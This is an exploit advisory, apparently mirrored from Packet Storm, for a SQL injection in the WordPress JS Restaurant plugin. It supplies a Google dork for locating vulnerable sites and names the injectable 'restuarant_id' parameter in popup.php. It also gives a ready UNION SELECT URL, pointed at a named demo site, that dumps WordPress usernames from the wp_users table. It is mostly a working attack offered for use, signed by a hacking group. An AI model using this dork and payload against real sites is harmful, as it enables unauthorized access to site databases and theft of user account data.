WordPress JS Restaurant plugin suffers from a remote SQL injection vulnerability.
48ddb834b6b5c6d9fbea650fb35d3b87734eda81ec9641f4a14fba0edf197f4b#########################################################################
# Exploit Title : Wordpress JS Restaurant Plugin SQL Injection Vulnerability
#
# Author : Ashiyane Digital Security Team
#
# Security Risk : HIgh
#
# Google Dork : inurl:/wp-content/plugins/js-restaurant/popup.php?restuarant_id=
#
##############
# Location:site/[path]/wp-content/plugins/js-restaurant/popup.php?restuarant_id=[SQLi]
#
# DEm0:
#
#http://smartsocialmedia.fr/demo/restaurant/wp-content/plugins/js-restaurant/popup.php
#?restuarant_id=-2%20UNION%20SELECT%201,group_concat%28user_login%29,3,4,5,6,7,8,9,10,
#11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20wp_users--+
#
##############
# Special Tnx : Reza-S4T4n , C4t , Angel-D3m0n , Alireza666 ,...
##############
#
# Greetz to: My Lord ALLAH
#
##############
#
# bY T3rm!nat0r5
#
##########################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed